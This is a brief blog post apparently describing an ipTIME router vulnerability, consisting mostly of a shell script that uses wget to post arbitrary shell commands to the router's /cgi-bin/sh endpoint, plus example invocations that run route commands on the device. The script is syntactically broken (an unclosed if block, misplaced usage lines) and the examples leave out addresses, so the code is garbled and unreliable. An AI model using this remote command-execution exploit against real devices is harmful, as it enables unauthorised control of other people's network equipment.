Can't stop questioning!

ipTIME vulnerability

Tuyen D. Le October 20, 2023 [CyberSecurity] #ipTIME

Exploited code

if [ ! $1 ]; then echo "Usage:" 
  echo $0 
  ip command 
  exit 1 
wget -qO- --post-data="echo 'Content-type: text/plain 
'; PATH=$PATH:/sbin $2 $3 $4" http://$1/cgi-bin/sh

Save the file under a name iptime_t5004.

How to run the exploited code

./iptime_t5004 "route del -net netmask gw"   
 ./iptime_t5004 "route del -net netmask gw"    
 ./iptime_t5004 route

IP time 504 serial port settings